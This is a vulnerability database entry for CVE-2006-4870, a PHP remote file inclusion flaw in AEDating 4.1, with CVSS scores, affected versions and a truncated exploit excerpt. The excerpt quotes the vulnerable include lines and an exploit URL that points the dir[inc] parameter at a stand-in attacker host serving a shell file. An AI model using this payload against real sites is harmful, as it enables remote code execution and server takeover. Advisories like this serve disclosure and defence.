7.5
CVSSv2

CVE-2006-4870

Published: 19/09/2006 Updated: 19/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Multiple PHP remote file inclusion vulnerabilities in AEDating 4.1, and possibly earlier versions, allow remote malicious users to execute arbitrary PHP code via a URL in the dir[inc] parameter in (1) inc/design.inc.php or (2) inc/admin_design.inc.php.

Vulnerable Product Search on Vulmon Subscribe to Product

aewebworks aedating

aewebworks aedating 4.0

Exploits

AEDating (all versions) Remote File inclusion Vulnerable code: /inc/designincphp /inc/admin_designincphp require_once( "$dir[inc]dbincphp" ); require_once( "$dir[inc]profincphp" ); Exploit: sitecom/[script_path]/inc/designincphp?dir[inc]=evilcom/shelltxt? sitecom/[script_path]/inc/admin_designincphp?dir[inc ...